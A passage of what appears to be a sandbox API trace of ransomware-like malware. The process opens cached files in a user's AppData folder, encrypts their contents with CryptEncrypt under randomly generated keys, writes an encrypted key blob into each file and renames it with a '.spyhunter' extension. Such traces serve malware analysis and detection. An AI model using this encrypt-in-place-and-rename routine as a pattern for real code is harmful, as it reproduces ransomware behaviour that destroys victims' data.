HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 151 [0152.262] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".txt") returned 0x0 [0152.262] GetProcessHeap () returned 0x2c0000 [0152.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.262] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec4c*=0x6e3, lpOverlapped=0x0) returned 1 [0152.269] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.269] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x270ec4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec4c*=0x6e3, lpOverlapped=0x0) returned 1 [0152.269] GetProcessHeap () returned 0x2c0000 [0152.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.269] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.269] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec4c, lpOverlapped=0x0 | out: lpBuffer=0x270ec8c*, lpNumberOfBytesWritten=0x270ec4c*=0x4, lpOverlapped=0x0) returned 1 [0152.270] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec4c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec4c*=0x30, lpOverlapped=0x0) returned 1 [0152.270] CloseHandle (hObject=0xa0) returned 1 [0152.270] GetProcessHeap () returned 0x2c0000 [0152.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.270] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.spyhunter") returned 161 [0152.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873.spyhunter")) returned 1 [0152.271] GetProcessHeap () returned 0x2c0000 [0152.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.271] GetProcessHeap () returned 0x2c0000 [0152.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.271] GetProcessHeap () returned 0x2c0000 [0152.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe7088 | out: hHeap=0x2c0000) returned 1 [0152.271] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec88 | out: pbBuffer=0x270ec88) returned 1 [0152.271] GetProcessHeap () returned 0x2c0000 [0152.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.272] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec80*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec80*=0x30) returned 1 [0152.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.272] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 151 [0152.272] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".txt") returned 0x0 [0152.272] GetProcessHeap () returned 0x2c0000 [0152.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.273] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec44*=0x5ed, lpOverlapped=0x0) returned 1 [0152.301] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffa13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.301] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x5ed, lpNumberOfBytesWritten=0x270ec44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec44*=0x5ed, lpOverlapped=0x0) returned 1 [0152.301] GetProcessHeap () returned 0x2c0000 [0152.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.302] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.302] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec44, lpOverlapped=0x0 | out: lpBuffer=0x270ec84*, lpNumberOfBytesWritten=0x270ec44*=0x4, lpOverlapped=0x0) returned 1 [0152.302] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec44, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec44*=0x30, lpOverlapped=0x0) returned 1 [0152.302] CloseHandle (hObject=0xa0) returned 1 [0152.302] GetProcessHeap () returned 0x2c0000 [0152.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.302] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.spyhunter") returned 161 [0152.302] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150.spyhunter")) returned 1 [0152.303] GetProcessHeap () returned 0x2c0000 [0152.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.303] GetProcessHeap () returned 0x2c0000 [0152.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.303] GetProcessHeap () returned 0x2c0000 [0152.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe6d98 | out: hHeap=0x2c0000) returned 1 [0152.303] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec88 | out: pbBuffer=0x270ec88) returned 1 [0152.303] GetProcessHeap () returned 0x2c0000 [0152.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.304] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec80*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec80*=0x30) returned 1 [0152.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.304] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 151 [0152.304] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".txt") returned 0x0 [0152.304] GetProcessHeap () returned 0x2c0000 [0152.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.305] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec44*=0x652, lpOverlapped=0x0) returned 1 [0152.596] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff9ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.596] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x652, lpNumberOfBytesWritten=0x270ec44, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec44*=0x652, lpOverlapped=0x0) returned 1 [0152.596] GetProcessHeap () returned 0x2c0000 [0152.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.596] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.596] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec44, lpOverlapped=0x0 | out: lpBuffer=0x270ec84*, lpNumberOfBytesWritten=0x270ec44*=0x4, lpOverlapped=0x0) returned 1 [0152.596] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec44, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec44*=0x30, lpOverlapped=0x0) returned 1 [0152.596] CloseHandle (hObject=0xa0) returned 1 [0152.597] GetProcessHeap () returned 0x2c0000 [0152.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.597] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.spyhunter") returned 161 [0152.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e.spyhunter")) returned 1 [0152.598] GetProcessHeap () returned 0x2c0000 [0152.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.598] GetProcessHeap () returned 0x2c0000 [0152.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.598] GetProcessHeap () returned 0x2c0000 [0152.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe64c8 | out: hHeap=0x2c0000) returned 1 [0152.598] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec80 | out: pbBuffer=0x270ec80) returned 1 [0152.598] GetProcessHeap () returned 0x2c0000 [0152.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.598] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec78*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec78*=0x30) returned 1 [0152.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.599] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 118 [0152.599] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".txt") returned 0x0 [0152.599] GetProcessHeap () returned 0x2c0000 [0152.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.599] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec3c*=0x2800, lpOverlapped=0x0) returned 1 [0152.601] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.601] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ec3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec3c*=0x2800, lpOverlapped=0x0) returned 1 [0152.601] GetProcessHeap () returned 0x2c0000 [0152.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.601] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.601] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec3c, lpOverlapped=0x0 | out: lpBuffer=0x270ec7c*, lpNumberOfBytesWritten=0x270ec3c*=0x4, lpOverlapped=0x0) returned 1 [0152.601] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec3c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec3c*=0x30, lpOverlapped=0x0) returned 1 [0152.601] CloseHandle (hObject=0xa0) returned 1 [0152.601] GetProcessHeap () returned 0x2c0000 [0152.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.601] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.spyhunter") returned 128 [0152.601] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015.spyhunter")) returned 1 [0152.602] GetProcessHeap () returned 0x2c0000 [0152.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.602] GetProcessHeap () returned 0x2c0000 [0152.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.602] GetProcessHeap () returned 0x2c0000 [0152.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc3548 | out: hHeap=0x2c0000) returned 1 [0152.602] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec80 | out: pbBuffer=0x270ec80) returned 1 [0152.602] GetProcessHeap () returned 0x2c0000 [0152.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.602] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec78*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec78*=0x30) returned 1 [0152.603] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.603] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 151 [0152.603] StrStrW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".txt") returned 0x0 [0152.603] GetProcessHeap () returned 0x2c0000 [0152.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.603] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec3c*=0x59d, lpOverlapped=0x0) returned 1 [0152.680] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffa63, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.680] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x59d, lpNumberOfBytesWritten=0x270ec3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec3c*=0x59d, lpOverlapped=0x0) returned 1 [0152.680] GetProcessHeap () returned 0x2c0000 [0152.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.680] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.681] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec3c, lpOverlapped=0x0 | out: lpBuffer=0x270ec7c*, lpNumberOfBytesWritten=0x270ec3c*=0x4, lpOverlapped=0x0) returned 1 [0152.681] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec3c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec3c*=0x30, lpOverlapped=0x0) returned 1 [0152.681] CloseHandle (hObject=0xa0) returned 1 [0152.681] GetProcessHeap () returned 0x2c0000 [0152.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.681] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.spyhunter") returned 161 [0152.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61.spyhunter")) returned 1 [0152.682] GetProcessHeap () returned 0x2c0000 [0152.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.682] GetProcessHeap () returned 0x2c0000 [0152.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.682] GetProcessHeap () returned 0x2c0000 [0152.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe6060 | out: hHeap=0x2c0000) returned 1 [0152.682] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec78 | out: pbBuffer=0x270ec78) returned 1 [0152.682] GetProcessHeap () returned 0x2c0000 [0152.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.683] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec70*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec70*=0x30) returned 1 [0152.683] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.684] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 151 [0152.684] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".txt") returned 0x0 [0152.684] GetProcessHeap () returned 0x2c0000 [0152.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.684] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec34*=0x1cf, lpOverlapped=0x0) returned 1 [0152.685] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.685] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x270ec34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec34*=0x1cf, lpOverlapped=0x0) returned 1 [0152.685] GetProcessHeap () returned 0x2c0000 [0152.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.685] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | 